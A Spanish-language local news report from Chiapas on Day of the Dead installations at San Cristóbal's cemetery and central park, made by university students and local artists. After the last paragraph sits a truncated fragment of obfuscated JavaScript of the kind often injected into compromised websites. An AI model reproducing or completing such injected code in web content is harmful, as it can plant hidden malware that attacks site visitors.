Se inauguran atractivos por el Día de muertos en San Cristóbal

Óscar Gómez/ Corresponsal

29 de octubre del 2024. SCLC.- Se inauguró oficialmente la ambientación en el acceso al Panteón de la ciudad. Este proyecto fue realizado por estudiantes de diversas carreras de la UACH, así como el tradicional altar de muertos en el Quisco del Parque de San Cristóbal.

Durante la inauguración de los atractivos del panteón municipal, los estudiantes explicaron los materiales utilizados en la creación de catrinas y calaveras, un esfuerzo conjunto con otras ingenierías y licenciaturas. Además, se presentaron cortometrajes elaborados por alumnos y egresados, que abordaron mitos y leyendas locales como “La muerte”, “Elena”, “Los Cheles del perro” y “El taxi”.

De la misma forma, se inauguró un altar en el parque central, incluyendo el Quiosco, en el que colaboraron artistas locales, usando incluso material reciclado, gracias al apoyo y colaboración de trabajadores de limpia municipal, que elaboraron una calavera con material reciclado.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Instalan Consejo de Protección Civil y presentan Programas Especiales 2026 en San Cristóbal

San Cristóbal de Las Casas, 17 de febrero de 2026.– La presidenta municipal, Mtra. Fabiola …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *